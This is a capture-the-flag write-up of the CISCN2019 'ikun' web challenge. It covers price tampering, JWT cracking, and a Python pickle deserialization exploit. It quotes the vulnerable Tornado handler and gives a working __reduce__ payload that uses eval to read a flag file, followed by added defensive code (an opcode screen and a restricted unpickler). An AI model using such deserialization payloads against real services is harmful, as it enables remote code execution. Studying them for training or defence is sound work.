BUUCTF | [CISCN2019 North Division Day1 Web2] ikun

Steps:

Find the lv6 purchase page and modify the discount to buy lv6; then find the admin login page, crack the JWT and log in as admin; click the button to become a big member, and use the Python pickle deserialization vulnerability to read the flag.


Analysis:

Other people's writeups for this challenge are very detailed; here I just record the points I didn't understand myself.

import pickle
import urllib

import tornado.web

# BaseHandler is the application's own base class, defined elsewhere in the challenge source.


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            # pickle provides a simple persistence mechanism: objects can be stored as a file on disk.
            #
            # The pickle module is Python-only; almost every Python data type (lists, dicts, sets, ...)
            # can be serialized with it.
            #
            # Pickled data is poorly readable and not generally recognizable by humans.
            p = pickle.loads(urllib.unquote(become))
            # urllib.unquote: decodes the %xx escapes of the URL-encoded parameter back to the raw string
            # pickle.loads(bytes_object): reads the packed object back from the bytes and returns it
            #   -> the client-controlled 'become' value is deserialized directly; this is the vulnerability
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

Payload (generates the become parameter; run under a Python 2 environment):

import pickle
import urllib

class payload(object):
    def __reduce__(self):
        return (eval, ("open('/flag.txt','r').read()",))
# __reduce__: when you define an extension type (a type implemented with Python's C API) and want to pickle it, you must tell Python how.
# Once __reduce__ is defined, it is called whenever the object is pickled.
# It returns either a string naming a global (which Python looks up and pickles) or a tuple.
# The tuple has 2 to 5 elements:
#       a callable object, called to rebuild the object; [eval in our case]
#       a tuple of arguments for that callable; [open('/flag.txt','r').read() in our case]
#       the state to be passed to __setstate__ (optional);
#       an iterator producing the list items to be pickled (optional);
#       an iterator producing the dict items to be pickled (optional)
a = pickle.dumps(payload())
# pickle.dumps(obj): returns the pickled object as a byte string, no file needs to be written
a = urllib.quote(a)
print a
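To show the defensive side of the same code path (the handler's pickle.loads on the become parameter, and the __reduce__ mechanism the payload relies on), here is an added example that is not part of the original writeup or the challenge source. It is written for Python 3 rather than the challenge's Python 2, and the names handle_become, dangerous_opcodes, RestrictedUnpickler and Gadget are assumptions of this example. It first disassembles the incoming pickle with pickletools (which never executes it) and reports the opcodes that let an unpickler import and call a callable, then loads with an Unpickler whose find_class refuses every global, so a __reduce__ gadget of the shape shown above cannot obtain eval or any other callable. The Gadget class below uses a harmless callable on purpose.

```python
import io
import pickle
import pickletools
import urllib.parse

# Opcodes that make the unpickler import and/or call a callable. Any of them in a
# pickle received from a client is a red flag; plain data never needs them.
_DANGEROUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD",
}


def dangerous_opcodes(data: bytes) -> list:
    """Return the names of code-execution-capable opcodes in a pickle, without
    executing it (pickletools.genops only disassembles)."""
    found = []
    try:
        for op, _arg, _pos in pickletools.genops(data):
            if op.name in _DANGEROUS_OPCODES:
                found.append(op.name)
    except Exception:
        # Truncated or malformed pickle: treat as suspicious rather than accept silently.
        found.append("MALFORMED")
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global name.

    The challenge payload works because __reduce__ makes the unpickler import and
    call a callable (eval). With find_class refusing every lookup, no callable can
    be obtained, so only plain data (ints, str, bytes, lists, dicts, tuples) loads.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden in client-supplied pickles" % (module, name)
        )


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def restricted_load_rejects(data: bytes) -> bool:
    """True if the restricted unpickler refuses the pickle (used for checks)."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def handle_become(become_param: str):
    """Hardened mirror of the handler's POST logic: URL-decode, screen the opcodes,
    then load with the restricted unpickler. Returns (ok, result_or_reason)."""
    raw = urllib.parse.unquote_to_bytes(become_param)
    bad = dangerous_opcodes(raw)
    if bad:
        return (False, "rejected: %s" % ", ".join(sorted(set(bad))))
    try:
        return (True, safe_loads(raw))
    except pickle.UnpicklingError as exc:
        return (False, "rejected: %s" % exc)


# --- constructed sample inputs (hypothetical, not from the challenge) ---
class Gadget(object):
    # Same shape as the page's payload class, but with a harmless callable (str)
    # so that the demonstration never executes anything dangerous.
    def __reduce__(self):
        return (str, ("harmless",))


BENIGN_PARAM = urllib.parse.quote(pickle.dumps({"member": 1, "name": "ikun"}))
GADGET_PARAM = urllib.parse.quote(pickle.dumps(Gadget()))

if __name__ == "__main__":
    print(handle_become(BENIGN_PARAM))   # plain dict is accepted
    print(handle_become(GADGET_PARAM))   # gadget is rejected at the opcode screen
```

The opcode screen is the detection layer (it also makes a good log line for a WAF or an IDS signature on this endpoint), and the restricted find_class is the mitigation that holds even if the screen is bypassed; for a real application the better fix is to not accept pickle from clients at all and use JSON for the become value.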

For the full details, see these links:

https://www.zhaoj.in/read-5946.html

https://blog.csdn.net/weixin_43345082/article/details/97817909

https://blog.csdn.net/weixin_43411585/article/details/88854544

https://blog.csdn.net/wf592523813/article/details/79141463

https://www.cnblogs.com/lincappu/p/8296078.html

https://www.cnblogs.com/angelyan/p/11079267.html

https://www.jb51.net/article/135407.htm

Origin www.cnblogs.com/chrysanthemum/p/11786132.html